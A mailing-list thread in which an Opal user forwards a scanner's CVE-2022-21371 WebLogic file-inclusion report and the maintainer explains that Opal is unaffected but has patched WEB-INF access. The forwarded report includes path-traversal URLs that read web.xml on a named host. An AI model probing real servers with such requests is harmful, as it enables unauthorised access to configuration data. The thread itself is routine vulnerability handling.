CVE-2022-21371 - Oracle WebLogic Server Local File Inclusion
126 views
Skip to first unread message
Tom Bishop
Jan 9, 2023, 10:30:30 AM1/9/23
to obiba...@googlegroups.com
Hi,
One of our collaborators has raised the following
issue. I guess it came from some kind of automated vulnerability scan. Does Opal use Oracle WebLogic Server and if so is it one of the reported versions
below?
Thanks
Tom
Subject: CVE-2022-21371 - Oracle WebLogic Server Local File Inclusion
An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0,
12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data
url vuln: https://interconnect.wur.nl/
Steps To Reproduce:
1. visit url https://<HOSTNAME>//WEB-INF/web.xml
/.//WEB-INF/web.xml
Impact:
Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data
Yannick Marcon
Jan 9, 2023, 12:53:20 PM1/9/23
to obiba...@googlegroups.com
Hi,
Opal does not use Oracle WebLogic Server. Nevertheless direct access to the WEB-INF directory has been fixed recently. This was a minor issue for Opal as the web.xml does not contain any sensible information. It will be part of the next 4.5 patch release.
Regards
Yannick
--
You received this message because you are subscribed to the Google Groups "obiba-users" group.
To unsubscribe from this group and stop receiving emails from it, send an email to obiba-users...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/obiba-users/LO4P265MB379291EE5342592AD45A8F2EB9FE9%40LO4P265MB3792.GBRP265.PROD.OUTLOOK.COM.
Tom Bishop
Jan 9, 2023, 2:15:30 PM1/9/23
to obiba...@googlegroups.com
Hi Yannick,
Great, thanks for clearing that up!
Tom
From: obiba...@googlegroups.com <obiba...@googlegroups.com> on behalf of Yannick Marcon <yannick...@obiba.org>
Sent: Monday, January 9, 2023 5:53 PM
To: obiba...@googlegroups.com <obiba...@googlegroups.com>
Subject: Re: [OBiBa] CVE-2022-21371 - Oracle WebLogic Server Local File Inclusion
Sent: Monday, January 9, 2023 5:53 PM
To: obiba...@googlegroups.com <obiba...@googlegroups.com>
Subject: Re: [OBiBa] CVE-2022-21371 - Oracle WebLogic Server Local File Inclusion
To view this discussion on the web visit
https://groups.google.com/d/msgid/obiba-users/CAGrE6ovN0goFzYwKw_TgkWCoqUw4Q8uhS-ov33eMP%2BMquf8BkQ%40mail.gmail.com.
Yannick Marcon
Jan 10, 2023, 7:25:01 AM1/10/23
to obiba...@googlegroups.com
Hi Tom,
Opal 4.5.4 has been released with the fix.
Best
Yannick
To view this discussion on the web visit https://groups.google.com/d/msgid/obiba-users/LO4P265MB37929902FA52816B5509BBE3B9FE9%40LO4P265MB3792.GBRP265.PROD.OUTLOOK.COM.
Tom Bishop
Jan 10, 2023, 8:22:41 AM1/10/23
to obiba...@googlegroups.com
Thanks Yannick for this prompt fix
Tom
To view this discussion on the web visit https://groups.google.com/d/msgid/obiba-users/CAGrE6ovvEk0w4QYo-3pP8obuMU_JGBunHE-_XKnCh_%3DLWQk7_w%40mail.gmail.com.
Reply all
Reply to author
Forward
0 new messages